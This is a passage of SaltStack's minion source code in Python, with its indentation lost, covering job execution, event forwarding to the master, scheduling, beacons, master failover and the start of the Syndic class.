self.utils = salt.loader.utils(self.opts)
if self.opts.get('multimaster', False):
s_opts = copy.deepcopy(self.opts)
functions = salt.loader.minion_mods(s_opts, utils=self.utils, proxy=proxy,
loaded_base_name=self.loaded_base_name, notify=notify)
else:
functions = salt.loader.minion_mods(self.opts, utils=self.utils, notify=notify, proxy=proxy)
returners = salt.loader.returners(self.opts, functions)
errors = {}
if '_errors' in functions:
errors = functions['_errors']
functions.pop('_errors')
# we're done, reset the limits!
if modules_max_memory is True:
resource.setrlimit(resource.RLIMIT_AS, old_mem_limit)
executors = salt.loader.executors(self.opts, functions)
return functions, returners, errors, executors
def _send_req_sync(self, load, timeout):
channel = salt.transport.Channel.factory(self.opts)
return channel.send(load, timeout=timeout)
@tornado.gen.coroutine
def _send_req_async(self, load, timeout):
channel = salt.transport.client.AsyncReqChannel.factory(self.opts)
ret = yield channel.send(load, timeout=timeout)
raise tornado.gen.Return(ret)
def _fire_master(self, data=None, tag=None, events=None, pretag=None, timeout=60, sync=True):
'''
Fire an event on the master, or drop message if unable to send.
'''
load = {'id': self.opts['id'],
'cmd': '_minion_event',
'pretag': pretag,
'tok': self.tok}
if events:
load['events'] = events
elif data and tag:
load['data'] = data
load['tag'] = tag
elif not data and tag:
load['data'] = {}
load['tag'] = tag
else:
return
def timeout_handler(*_):
log.info('fire_master failed: master could not be contacted. Request timed out.')
return True
if sync:
try:
self._send_req_sync(load, timeout)
except salt.exceptions.SaltReqTimeoutError:
log.info('fire_master failed: master could not be contacted. Request timed out.')
except Exception:
log.info('fire_master failed: {0}'.format(traceback.format_exc()))
return False
else:
with tornado.stack_context.ExceptionStackContext(timeout_handler):
self._send_req_async(load, timeout, callback=lambda f: None) # pylint: disable=unexpected-keyword-arg
return True
def _handle_decoded_payload(self, data):
'''
Override this method if you wish to handle the decoded data
differently.
'''
if 'user' in data:
log.info(
'User {0[user]} Executing command {0[fun]} with jid '
'{0[jid]}'.format(data)
)
else:
log.info(
'Executing command {0[fun]} with jid {0[jid]}'.format(data)
)
log.debug('Command details {0}'.format(data))
# Don't duplicate jobs
log.trace('Started JIDs: {0}'.format(self.jid_queue))
if self.jid_queue is not None:
if data['jid'] in self.jid_queue:
return
else:
self.jid_queue.append(data['jid'])
if len(self.jid_queue) > self.opts['minion_jid_queue_hwm']:
self.jid_queue.pop(0)
if isinstance(data['fun'], six.string_types):
if data['fun'] == 'sys.reload_modules':
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
self.schedule.functions = self.functions
self.schedule.returners = self.returners
# We stash an instance references to allow for the socket
# communication in Windows. You can't pickle functions, and thus
# python needs to be able to reconstruct the reference on the other
# side.
instance = self
multiprocessing_enabled = self.opts.get('multiprocessing', True)
if multiprocessing_enabled:
if sys.platform.startswith('win'):
# let python reconstruct the minion on the other side if we're
# running on windows
instance = None
with default_signals(signal.SIGINT, signal.SIGTERM):
process = SignalHandlingMultiprocessingProcess(
target=self._target, args=(instance, self.opts, data, self.connected)
)
else:
process = threading.Thread(
target=self._target,
args=(instance, self.opts, data, self.connected),
name=data['jid']
)
if multiprocessing_enabled:
with default_signals(signal.SIGINT, signal.SIGTERM):
# Reset current signals before starting the process in
# order not to inherit the current signal handlers
process.start()
else:
process.start()
# TODO: remove the windows specific check?
if multiprocessing_enabled and not salt.utils.is_windows():
# we only want to join() immediately if we are daemonizing a process
process.join()
else:
self.win_proc.append(process)
def ctx(self):
'''Return a single context manager for the minion's data
'''
if six.PY2:
return contextlib.nested(
self.functions.context_dict.clone(),
self.returners.context_dict.clone(),
self.executors.context_dict.clone(),
)
else:
exitstack = contextlib.ExitStack()
exitstack.push(self.functions.context_dict.clone())
exitstack.push(self.returners.context_dict.clone())
exitstack.push(self.executors.context_dict.clone())
return exitstack
@classmethod
def _target(cls, minion_instance, opts, data, connected):
if not minion_instance:
minion_instance = cls(opts)
minion_instance.connected = connected
if not hasattr(minion_instance, 'functions'):
functions, returners, function_errors, executors = (
minion_instance._load_modules(grains=opts['grains'])
)
minion_instance.functions = functions
minion_instance.returners = returners
minion_instance.function_errors = function_errors
minion_instance.executors = executors
if not hasattr(minion_instance, 'serial'):
minion_instance.serial = salt.payload.Serial(opts)
if not hasattr(minion_instance, 'proc_dir'):
uid = salt.utils.get_uid(user=opts.get('user', None))
minion_instance.proc_dir = (
get_proc_dir(opts['cachedir'], uid=uid)
)
with tornado.stack_context.StackContext(minion_instance.ctx):
if isinstance(data['fun'], tuple) or isinstance(data['fun'], list):
Minion._thread_multi_return(minion_instance, opts, data)
else:
Minion._thread_return(minion_instance, opts, data)
@classmethod
def _thread_return(cls, minion_instance, opts, data):
'''
        This method should be used as a threading target; it starts the actual
        minion-side execution.
'''
fn_ = os.path.join(minion_instance.proc_dir, data['jid'])
if opts['multiprocessing'] and not salt.utils.is_windows():
# Shutdown the multiprocessing before daemonizing
salt.log.setup.shutdown_multiprocessing_logging()
salt.utils.daemonize_if(opts)
# Reconfigure multiprocessing logging after daemonizing
salt.log.setup.setup_multiprocessing_logging()
salt.utils.appendproctitle('{0}._thread_return {1}'.format(cls.__name__, data['jid']))
sdata = {'pid': os.getpid()}
sdata.update(data)
log.info('Starting a new job with PID {0}'.format(sdata['pid']))
with salt.utils.fopen(fn_, 'w+b') as fp_:
fp_.write(minion_instance.serial.dumps(sdata))
ret = {'success': False}
function_name = data['fun']
if function_name in minion_instance.functions:
try:
if minion_instance.connected and minion_instance.opts['pillar'].get('minion_blackout', False):
# this minion is blacked out. Only allow saltutil.refresh_pillar
if function_name != 'saltutil.refresh_pillar' and \
function_name not in minion_instance.opts['pillar'].get('minion_blackout_whitelist', []):
raise SaltInvocationError('Minion in blackout mode. Set \'minion_blackout\' '
'to False in pillar to resume operations. Only '
'saltutil.refresh_pillar allowed in blackout mode.')
func = minion_instance.functions[function_name]
args, kwargs = load_args_and_kwargs(
func,
data['arg'],
data)
minion_instance.functions.pack['__context__']['retcode'] = 0
executors = data.get('module_executors') or opts.get('module_executors', ['direct_call.get'])
if isinstance(executors, six.string_types):
executors = [executors]
elif not isinstance(executors, list) or not executors:
raise SaltInvocationError("Wrong executors specification: {0}. String or non-empty list expected".
format(executors))
if opts.get('sudo_user', '') and executors[-1] != 'sudo.get':
if executors[-1] in FUNCTION_EXECUTORS:
executors[-1] = 'sudo.get' # replace
else:
executors.append('sudo.get') # append
log.trace('Executors list {0}'.format(executors)) # pylint: disable=no-member
# Get executors
def get_executor(name):
executor_class = minion_instance.executors.get(name)
if executor_class is None:
raise SaltInvocationError("Executor '{0}' is not available".format(name))
return executor_class
# Get the last one that is function executor
executor = get_executor(executors.pop())(opts, data, func, args, kwargs)
# Instantiate others from bottom to the top
for executor_name in reversed(executors):
executor = get_executor(executor_name)(opts, data, executor)
return_data = executor.execute()
if isinstance(return_data, types.GeneratorType):
ind = 0
iret = {}
for single in return_data:
if isinstance(single, dict) and isinstance(iret, dict):
iret.update(single)
else:
if not iret:
iret = []
iret.append(single)
tag = tagify([data['jid'], 'prog', opts['id'], str(ind)], 'job')
event_data = {'return': single}
minion_instance._fire_master(event_data, tag)
ind += 1
ret['return'] = iret
else:
ret['return'] = return_data
ret['retcode'] = minion_instance.functions.pack['__context__'].get(
'retcode',
0
)
ret['success'] = True
except CommandNotFoundError as exc:
msg = 'Command required for \'{0}\' not found'.format(
function_name
)
log.debug(msg, exc_info=True)
ret['return'] = '{0}: {1}'.format(msg, exc)
ret['out'] = 'nested'
except CommandExecutionError as exc:
log.error(
'A command in \'{0}\' had a problem: {1}'.format(
function_name,
exc
),
exc_info_on_loglevel=logging.DEBUG
)
ret['return'] = 'ERROR: {0}'.format(exc)
ret['out'] = 'nested'
except SaltInvocationError as exc:
log.error(
'Problem executing \'{0}\': {1}'.format(
function_name,
exc
),
exc_info_on_loglevel=logging.DEBUG
)
ret['return'] = 'ERROR executing \'{0}\': {1}'.format(
function_name, exc
)
ret['out'] = 'nested'
except TypeError as exc:
msg = 'Passed invalid arguments to {0}: {1}\n{2}'.format(function_name, exc, func.__doc__, )
log.warning(msg, exc_info_on_loglevel=logging.DEBUG)
ret['return'] = msg
ret['out'] = 'nested'
except Exception:
msg = 'The minion function caused an exception'
log.warning(msg, exc_info_on_loglevel=True)
salt.utils.error.fire_exception(salt.exceptions.MinionError(msg), opts, job=data)
ret['return'] = '{0}: {1}'.format(msg, traceback.format_exc())
ret['out'] = 'nested'
else:
ret['return'] = minion_instance.functions.missing_fun_string(function_name)
mod_name = function_name.split('.')[0]
if mod_name in minion_instance.function_errors:
ret['return'] += ' Possible reasons: \'{0}\''.format(
minion_instance.function_errors[mod_name]
)
ret['success'] = False
ret['retcode'] = 254
ret['out'] = 'nested'
ret['jid'] = data['jid']
ret['fun'] = data['fun']
ret['fun_args'] = data['arg']
if 'master_id' in data:
ret['master_id'] = data['master_id']
if 'metadata' in data:
if isinstance(data['metadata'], dict):
ret['metadata'] = data['metadata']
else:
log.warning('The metadata parameter must be a dictionary. Ignoring.')
if minion_instance.connected:
minion_instance._return_pub(
ret,
timeout=minion_instance._return_retry_timer()
)
# TODO: make a list? Seems odd to split it this late :/
if data['ret'] and isinstance(data['ret'], six.string_types):
if 'ret_config' in data:
ret['ret_config'] = data['ret_config']
if 'ret_kwargs' in data:
ret['ret_kwargs'] = data['ret_kwargs']
ret['id'] = opts['id']
for returner in set(data['ret'].split(',')):
try:
minion_instance.returners['{0}.returner'.format(
returner
)](ret)
except Exception as exc:
log.error(
'The return failed for job {0} {1}'.format(
data['jid'],
exc
)
)
log.error(traceback.format_exc())
@classmethod
def _thread_multi_return(cls, minion_instance, opts, data):
'''
        This method should be used as a threading target; it starts the actual
        minion-side execution.
'''
salt.utils.appendproctitle('{0}._thread_multi_return {1}'.format(cls.__name__, data['jid']))
ret = {
'return': {},
'success': {},
}
for ind in range(0, len(data['fun'])):
ret['success'][data['fun'][ind]] = False
try:
if minion_instance.connected and minion_instance.opts['pillar'].get('minion_blackout', False):
# this minion is blacked out. Only allow saltutil.refresh_pillar
if data['fun'][ind] != 'saltutil.refresh_pillar' and \
data['fun'][ind] not in minion_instance.opts['pillar'].get('minion_blackout_whitelist', []):
raise SaltInvocationError('Minion in blackout mode. Set \'minion_blackout\' '
'to False in pillar to resume operations. Only '
'saltutil.refresh_pillar allowed in blackout mode.')
func = minion_instance.functions[data['fun'][ind]]
args, kwargs = load_args_and_kwargs(
func,
data['arg'][ind],
data)
ret['return'][data['fun'][ind]] = func(*args, **kwargs)
ret['success'][data['fun'][ind]] = True
except Exception as exc:
trb = traceback.format_exc()
log.warning(
'The minion function caused an exception: {0}'.format(
exc
)
)
ret['return'][data['fun'][ind]] = trb
ret['jid'] = data['jid']
ret['fun'] = data['fun']
ret['fun_args'] = data['arg']
if 'metadata' in data:
ret['metadata'] = data['metadata']
if minion_instance.connected:
minion_instance._return_pub(
ret,
timeout=minion_instance._return_retry_timer()
)
if data['ret']:
if 'ret_config' in data:
ret['ret_config'] = data['ret_config']
if 'ret_kwargs' in data:
ret['ret_kwargs'] = data['ret_kwargs']
for returner in set(data['ret'].split(',')):
ret['id'] = opts['id']
try:
minion_instance.returners['{0}.returner'.format(
returner
)](ret)
except Exception as exc:
log.error(
'The return failed for job {0} {1}'.format(
data['jid'],
exc
)
)
def _return_pub(self, ret, ret_cmd='_return', timeout=60, sync=True):
'''
Return the data from the executed command to the master server
'''
jid = ret.get('jid', ret.get('__jid__'))
fun = ret.get('fun', ret.get('__fun__'))
if self.opts['multiprocessing']:
fn_ = os.path.join(self.proc_dir, jid)
if os.path.isfile(fn_):
try:
os.remove(fn_)
except (OSError, IOError):
# The file is gone already
pass
log.info('Returning information for job: {0}'.format(jid))
if ret_cmd == '_syndic_return':
load = {'cmd': ret_cmd,
'id': self.opts['id'],
'jid': jid,
'fun': fun,
'arg': ret.get('arg'),
'tgt': ret.get('tgt'),
'tgt_type': ret.get('tgt_type'),
'load': ret.get('__load__')}
if '__master_id__' in ret:
load['master_id'] = ret['__master_id__']
load['return'] = {}
for key, value in six.iteritems(ret):
if key.startswith('__'):
continue
load['return'][key] = value
else:
load = {'cmd': ret_cmd,
'id': self.opts['id']}
for key, value in six.iteritems(ret):
load[key] = value
if 'out' in ret:
if isinstance(ret['out'], six.string_types):
load['out'] = ret['out']
else:
log.error('Invalid outputter {0}. This is likely a bug.'
.format(ret['out']))
else:
try:
oput = self.functions[fun].__outputter__
except (KeyError, AttributeError, TypeError):
pass
else:
if isinstance(oput, six.string_types):
load['out'] = oput
if self.opts['cache_jobs']:
# Local job cache has been enabled
salt.utils.minion.cache_jobs(self.opts, load['jid'], ret)
if not self.opts['pub_ret']:
return ''
def timeout_handler(*_):
msg = ('The minion failed to return the job information for job '
'{0}. This is often due to the master being shut down or '
'overloaded. If the master is running consider increasing '
'the worker_threads value.').format(jid)
log.warning(msg)
return True
if sync:
try:
ret_val = self._send_req_sync(load, timeout=timeout)
except SaltReqTimeoutError:
timeout_handler()
return ''
else:
with tornado.stack_context.ExceptionStackContext(timeout_handler):
ret_val = self._send_req_async(load, timeout=timeout, callback=lambda f: None) # pylint: disable=unexpected-keyword-arg
log.trace('ret_val = {0}'.format(ret_val)) # pylint: disable=no-member
return ret_val
def _state_run(self):
'''
Execute a state run based on information set in the minion config file
'''
if self.opts['startup_states']:
if self.opts.get('master_type', 'str') == 'disable' and \
self.opts.get('file_client', 'remote') == 'remote':
log.warning('Cannot run startup_states when \'master_type\' is '
'set to \'disable\' and \'file_client\' is set to '
'\'remote\'. Skipping.')
else:
data = {'jid': 'req', 'ret': self.opts.get('ext_job_cache', '')}
if self.opts['startup_states'] == 'sls':
data['fun'] = 'state.sls'
data['arg'] = [self.opts['sls_list']]
elif self.opts['startup_states'] == 'top':
data['fun'] = 'state.top'
data['arg'] = [self.opts['top_file']]
else:
data['fun'] = 'state.highstate'
data['arg'] = []
self._handle_decoded_payload(data)
def _refresh_grains_watcher(self, refresh_interval_in_minutes):
'''
Create a loop that will fire a pillar refresh to inform a master about a change in the grains of this minion
:param refresh_interval_in_minutes:
:return: None
'''
if '__update_grains' not in self.opts.get('schedule', {}):
if 'schedule' not in self.opts:
self.opts['schedule'] = {}
self.opts['schedule'].update({
'__update_grains':
{
'function': 'event.fire',
'args': [{}, 'grains_refresh'],
'minutes': refresh_interval_in_minutes
}
})
def _fire_master_minion_start(self):
# Send an event to the master that the minion is live
self._fire_master(
'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
'minion_start'
)
# dup name spaced event
self._fire_master(
'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
tagify([self.opts['id'], 'start'], 'minion'),
)
def module_refresh(self, force_refresh=False, notify=False):
'''
Refresh the functions and returners.
'''
log.debug('Refreshing modules. Notify={0}'.format(notify))
self.functions, self.returners, _, self.executors = self._load_modules(force_refresh, notify=notify)
self.schedule.functions = self.functions
self.schedule.returners = self.returners
# TODO: only allow one future in flight at a time?
@tornado.gen.coroutine
def pillar_refresh(self, force_refresh=False):
'''
Refresh the pillar
'''
if self.connected:
log.debug('Refreshing pillar')
try:
self.opts['pillar'] = yield salt.pillar.get_async_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment'],
pillarenv=self.opts.get('pillarenv'),
).compile_pillar()
except SaltClientError:
# Do not exit if a pillar refresh fails.
log.error('Pillar data could not be refreshed. '
'One or more masters may be down!')
self.module_refresh(force_refresh)
def manage_schedule(self, tag, data):
'''
Refresh the functions and returners.
'''
func = data.get('func', None)
name = data.get('name', None)
schedule = data.get('schedule', None)
where = data.get('where', None)
persist = data.get('persist', None)
if func == 'delete':
self.schedule.delete_job(name, persist)
elif func == 'add':
self.schedule.add_job(schedule, persist)
elif func == 'modify':
self.schedule.modify_job(name, schedule, persist, where)
elif func == 'enable':
self.schedule.enable_schedule()
elif func == 'disable':
self.schedule.disable_schedule()
elif func == 'enable_job':
self.schedule.enable_job(name, persist, where)
elif func == 'run_job':
self.schedule.run_job(name)
elif func == 'disable_job':
self.schedule.disable_job(name, persist, where)
elif func == 'reload':
self.schedule.reload(schedule)
elif func == 'list':
self.schedule.list(where)
elif func == 'save_schedule':
self.schedule.save_schedule()
def manage_beacons(self, tag, data):
'''
Manage Beacons
'''
func = data.get('func', None)
name = data.get('name', None)
beacon_data = data.get('beacon_data', None)
if func == 'add':
self.beacons.add_beacon(name, beacon_data)
elif func == 'modify':
self.beacons.modify_beacon(name, beacon_data)
elif func == 'delete':
self.beacons.delete_beacon(name)
elif func == 'enable':
self.beacons.enable_beacons()
elif func == 'disable':
self.beacons.disable_beacons()
elif func == 'enable_beacon':
self.beacons.enable_beacon(name)
elif func == 'disable_beacon':
self.beacons.disable_beacon(name)
elif func == 'list':
self.beacons.list_beacons()
def environ_setenv(self, tag, data):
'''
Set the salt-minion main process environment according to
the data contained in the minion event data
'''
environ = data.get('environ', None)
if environ is None:
return False
false_unsets = data.get('false_unsets', False)
clear_all = data.get('clear_all', False)
import salt.modules.environ as mod_environ
return mod_environ.setenv(environ, false_unsets, clear_all)
def _pre_tune(self):
'''
Set the minion running flag and issue the appropriate warnings if
the minion cannot be started or is already running
'''
if self._running is None:
self._running = True
elif self._running is False:
log.error(
'This {0} was scheduled to stop. Not running '
'{0}.tune_in()'.format(self.__class__.__name__)
)
return
elif self._running is True:
log.error(
'This {0} is already running. Not running '
'{0}.tune_in()'.format(self.__class__.__name__)
)
return
try:
log.info(
'{0} is starting as user \'{1}\''.format(
self.__class__.__name__,
salt.utils.get_user()
)
)
except Exception as err:
# Only windows is allowed to fail here. See #3189. Log as debug in
# that case. Else, error.
log.log(
salt.utils.is_windows() and logging.DEBUG or logging.ERROR,
'Failed to get the user who is starting {0}'.format(
self.__class__.__name__
),
exc_info=err
)
def _mine_send(self, tag, data):
'''
Send mine data to the master
'''
channel = salt.transport.Channel.factory(self.opts)
data['tok'] = self.tok
try:
ret = channel.send(data)
return ret
except SaltReqTimeoutError:
log.warning('Unable to send mine data to master.')
return None
@tornado.gen.coroutine
def handle_event(self, package):
'''
Handle an event from the epull_sock (all local minion events)
'''
if not self.ready:
raise tornado.gen.Return()
tag, data = salt.utils.event.SaltEvent.unpack(package)
log.debug('Minion of "{0}" is handling event tag \'{1}\''.format(self.opts['master'], tag))
if tag.startswith('module_refresh'):
self.module_refresh(
force_refresh=data.get('force_refresh', False),
notify=data.get('notify', False)
)
elif tag.startswith('pillar_refresh'):
yield self.pillar_refresh(
force_refresh=data.get('force_refresh', False)
)
elif tag.startswith('manage_schedule'):
self.manage_schedule(tag, data)
elif tag.startswith('manage_beacons'):
self.manage_beacons(tag, data)
elif tag.startswith('grains_refresh'):
if (data.get('force_refresh', False) or
self.grains_cache != self.opts['grains']):
self.pillar_refresh(force_refresh=True)
self.grains_cache = self.opts['grains']
elif tag.startswith('environ_setenv'):
self.environ_setenv(tag, data)
elif tag.startswith('_minion_mine'):
self._mine_send(tag, data)
elif tag.startswith('fire_master'):
log.debug('Forwarding master event tag={tag}'.format(tag=data['tag']))
self._fire_master(data['data'], data['tag'], data['events'], data['pretag'])
elif tag.startswith('__master_disconnected') or tag.startswith('__master_failback'):
# if the master disconnect event is for a different master, ignore it
if tag.startswith('__master_disconnected') and data['master'] != self.opts['master']:
# not mine master, ignore
return
if tag.startswith('__master_failback'):
# if the master failback event is not for the top master, raise an exception
if data['master'] != self.opts['master_list'][0]:
raise SaltException('Bad master \'{0}\' when mine failback is \'{1}\''.format(
data['master'], self.opts['master']))
# if the master failback event is for the current master, raise an exception
elif data['master'] == self.opts['master'][0]:
raise SaltException('Already connected to \'{0}\''.format(data['master']))
if self.connected:
# we are not connected anymore
self.connected = False
# modify the scheduled job to fire only on reconnect
if self.opts['transport'] != 'tcp':
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master'],
'connected': False}
}
self.schedule.modify_job(name='__master_alive_{0}'.format(self.opts['master']),
schedule=schedule)
log.info('Connection to master {0} lost'.format(self.opts['master']))
if self.opts['master_type'] == 'failover':
log.info('Trying to tune in to next master from master-list')
if hasattr(self, 'pub_channel'):
self.pub_channel.on_recv(None)
if hasattr(self.pub_channel, 'auth'):
self.pub_channel.auth.invalidate()
if hasattr(self.pub_channel, 'close'):
self.pub_channel.close()
del self.pub_channel
# if eval_master finds a new master for us, self.connected
# will be True again on successful master authentication
try:
master, self.pub_channel = yield self.eval_master(
opts=self.opts,
failed=True,
failback=package.startswith('__master_failback'))
except SaltClientError:
pass
if self.connected:
self.opts['master'] = master
# re-init the subsystems to work with the new master
log.info('Re-initialising subsystems for new '
'master {0}'.format(self.opts['master']))
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
self.pub_channel.on_recv(self._handle_payload)
self._fire_master_minion_start()
log.info('Minion is ready to receive requests!')
# update scheduled job to run with the new master addr
if self.opts['transport'] != 'tcp':
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
self.schedule.modify_job(name='__master_alive_{0}'.format(self.opts['master']),
schedule=schedule)
if self.opts['master_failback'] and 'master_list' in self.opts:
if self.opts['master'] != self.opts['master_list'][0]:
schedule = {
'function': 'status.ping_master',
'seconds': self.opts['master_failback_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master_list'][0]}
}
self.schedule.modify_job(name='__master_failback',
schedule=schedule)
else:
self.schedule.delete_job(name='__master_failback', persist=True)
else:
self.restart = True
self.io_loop.stop()
elif tag.startswith('__master_connected'):
# handle this event only once. otherwise it will pollute the log
if not self.connected:
log.info('Connection to master {0} re-established'.format(self.opts['master']))
self.connected = True
# modify the __master_alive job to only fire,
# if the connection is lost again
if self.opts['transport'] != 'tcp':
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
self.schedule.modify_job(name='__master_alive_{0}'.format(self.opts['master']),
schedule=schedule)
elif tag.startswith('__schedule_return'):
self._return_pub(data, ret_cmd='_return', sync=False)
elif tag.startswith('_salt_error'):
if self.connected:
log.debug('Forwarding salt error event tag={tag}'.format(tag=tag))
self._fire_master(data, tag)
def _fallback_cleanups(self):
'''
Fallback cleanup routines, attempting to fix leaked processes, threads, etc.
'''
# Add an extra fallback in case a forked process leaks through
multiprocessing.active_children()
# Cleanup Windows threads
if not salt.utils.is_windows():
return
for thread in self.win_proc:
if not thread.is_alive():
thread.join()
try:
self.win_proc.remove(thread)
del thread
except (ValueError, NameError):
pass
# Main Minion Tune In
def tune_in(self, start=True):
'''
Lock onto the publisher. This is the main event loop for the minion
:rtype : None
'''
self._pre_tune()
log.debug('Minion \'{0}\' trying to tune in'.format(self.opts['id']))
if start:
self.sync_connect_master()
if self.connected:
self._fire_master_minion_start()
log.info('Minion is ready to receive requests!')
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
# Make sure to gracefully handle CTRL_LOGOFF_EVENT
salt.utils.enable_ctrl_logoff_handler()
# On first startup execute a state run if configured to do so
self._state_run()
loop_interval = self.opts['loop_interval']
try:
if self.opts['grains_refresh_every']: # If exists and is not zero. In minutes, not seconds!
if self.opts['grains_refresh_every'] > 1:
log.debug(
'Enabling the grains refresher. Will run every {0} minutes.'.format(
self.opts['grains_refresh_every'])
)
else: # Clean up minute vs. minutes in log message
log.debug(
'Enabling the grains refresher. Will run every {0} minute.'.format(
self.opts['grains_refresh_every'])
)
self._refresh_grains_watcher(
abs(self.opts['grains_refresh_every'])
)
except Exception as exc:
log.error(
'Exception occurred in attempt to initialize grain refresh routine during minion tune-in: {0}'.format(
exc)
)
self.periodic_callbacks = {}
# schedule the stuff that runs every interval
ping_interval = self.opts.get('ping_interval', 0) * 60
if ping_interval > 0 and self.connected:
def ping_master():
try:
if not self._fire_master('ping', 'minion_ping'):
if not self.opts.get('auth_safemode', True):
log.error('** Master Ping failed. Attempting to restart minion**')
delay = self.opts.get('random_reauth_delay', 5)
log.info('delaying random_reauth_delay {0}s'.format(delay))
# regular sys.exit raises an exception -- which isn't sufficient in a thread
os._exit(salt.defaults.exitcodes.SALT_KEEPALIVE)
except Exception:
log.warning('Attempt to ping master failed.', exc_on_loglevel=logging.DEBUG)
self.periodic_callbacks['ping'] = tornado.ioloop.PeriodicCallback(ping_master, ping_interval * 1000, io_loop=self.io_loop)
self.periodic_callbacks['cleanup'] = tornado.ioloop.PeriodicCallback(self._fallback_cleanups, loop_interval * 1000, io_loop=self.io_loop)
def handle_beacons():
# Process Beacons
beacons = None
try:
beacons = self.process_beacons(self.functions)
except Exception:
log.critical('The beacon errored: ', exc_info=True)
if beacons and self.connected:
self._fire_master(events=beacons)
self.periodic_callbacks['beacons'] = tornado.ioloop.PeriodicCallback(handle_beacons, loop_interval * 1000, io_loop=self.io_loop)
# TODO: actually listen to the return and change period
def handle_schedule():
self.process_schedule(self, loop_interval)
if hasattr(self, 'schedule'):
self.periodic_callbacks['schedule'] = tornado.ioloop.PeriodicCallback(handle_schedule, 1000, io_loop=self.io_loop)
# start all the other callbacks
for periodic_cb in six.itervalues(self.periodic_callbacks):
periodic_cb.start()
# add handler to subscriber
if hasattr(self, 'pub_channel') and self.pub_channel is not None:
self.pub_channel.on_recv(self._handle_payload)
elif self.opts.get('master_type') != 'disable':
log.error('No connection to master found. Scheduled jobs will not run.')
if start:
try:
self.io_loop.start()
if self.restart:
self.destroy()
except (KeyboardInterrupt, RuntimeError): # A RuntimeError can be re-raised by Tornado on shutdown
self.destroy()
def _handle_payload(self, payload):
if payload is not None and payload['enc'] == 'aes':
if self._target_load(payload['load']):
self._handle_decoded_payload(payload['load'])
elif self.opts['zmq_filtering']:
# In the filtering enabled case, we'd like to know when the minion sees something it shouldn't
log.trace('Broadcast message received not for this minion, Load: {0}'.format(payload['load']))
# If it's not AES, and thus has not been verified, we do nothing.
# In the future, we could add support for some clearfuncs, but
# the minion currently has no need.
def _target_load(self, load):
# Verify that the publication is valid
if 'tgt' not in load or 'jid' not in load or 'fun' not in load \
or 'arg' not in load:
return False
# Verify that the publication applies to this minion
# It's important to note that the master does some pre-processing
# to determine which minions to send a request to. So for example,
# a "salt -G 'grain_key:grain_val' test.ping" will invoke some
# pre-processing on the master and this minion should not see the
# publication if the master does not determine that it should.
if 'tgt_type' in load:
match_func = getattr(self.matcher,
'{0}_match'.format(load['tgt_type']), None)
if match_func is None:
return False
if load['tgt_type'] in ('grain', 'grain_pcre', 'pillar'):
delimiter = load.get('delimiter', DEFAULT_TARGET_DELIM)
if not match_func(load['tgt'], delimiter=delimiter):
return False
elif not match_func(load['tgt']):
return False
else:
if not self.matcher.glob_match(load['tgt']):
return False
return True
def destroy(self):
'''
Tear down the minion
'''
self._running = False
if hasattr(self, 'schedule'):
del self.schedule
if hasattr(self, 'pub_channel') and self.pub_channel is not None:
self.pub_channel.on_recv(None)
if hasattr(self.pub_channel, 'close'):
self.pub_channel.close()
del self.pub_channel
if hasattr(self, 'periodic_callbacks'):
for cb in six.itervalues(self.periodic_callbacks):
cb.stop()
def __del__(self):
self.destroy()
class Syndic(Minion):
'''
Make a Syndic minion, this minion will use the minion keys on the
master to authenticate with a higher level master.
'''
def __init__(self, opts, **kwargs):
self._syndic_interface = opts.get('interface')
self._syndic = True
# force auth_safemode True because Syndics don't support autorestart
opts['auth_safemode'] = True
opts['loop_interval'] = 1
super(Syndic, self).__init__(opts, **kwargs)
self.mminion = salt.minion.MasterMinion(opts)
self.jid_forward_cache = set()
self.jids = {}
self.raw_events = []
self.pub_future = None
def _handle_decoded_payload(self, data):
'''
Override this method if you wish to handle the decoded data
differently.
'''
# TODO: even do this??
data['to'] = int(data.get('to', self.opts['timeout'])) - 1
# Only forward the command if it didn't originate from ourselves
if data.get('master_id', 0) != self.opts.get('master_id', 1):
self.syndic_cmd(data)
def syndic_cmd(self, data):
'''
Take the now clear load and forward it on to the client cmd
'''
# Set up default tgt_type
if 'tgt_type' not in data:
data['tgt_type'] = 'glob'
kwargs = {}
# optionally add a few fields to the publish data
for field in ('master_id', # which master the job came from
'user', # which user ran the job
):
if field in data:
kwargs[field] = data[field]
def timeout_handler(*args):
log.warning('Unable to forward pub data: {0}'.format(args[1]))
return True
with tornado.stack_context.ExceptionStackContext(timeout_handler):
self.local.pub_async(data['tgt'],
data['fun'],
data['arg'],
data['tgt_type'],
data['ret'],
data['jid'],
data['to'],
io_loop=self.io_loop,
callback=lambda _: None,
**kwargs)
def fire_master_syndic_start(self):
# Send an event to the master that the minion is live
self._fire_master(
'Syndic {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
'syndic_start',
sync=False,
)
self._fire_master(
'Syndic {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
tagify([self.opts['id'], 'start'], 'syndic'),
sync=False,
)
# TODO: clean up docs
def tune_in_no_block(self):
'''
Executes the tune_in sequence but omits extra logging and the
management of the event bus assuming that these are handled outside
the tune_in sequence
'''
# Instantiate the local client
self.local = salt.client.get_local_client(
self.opts['_minion_conf_file'], io_loop=self.io_loop)
# add handler to subscriber
self.pub_channel.on_recv(self._process_cmd_socket)
def _process_cmd_socket(self, payload):
if payload is not None and payload['enc'] == 'aes':
log.trace('Handling payload')
self._handle_decoded_payload(payload['load'])
# If it's not AES, and thus has not been verified, we do nothing.
# In the future, we could add support for some clearfuncs, but
# the syndic currently has no need.
@tornado.gen.coroutine
def _return_pub_multi(self, values):
for value in values:
yield self._return_pub(value,
'_syndic_return',
timeout=self._return_retry_timer(),
sync=False)
@tornado.gen.coroutine
def reconnect(self):
if hasattr(self, 'pub_channel'):
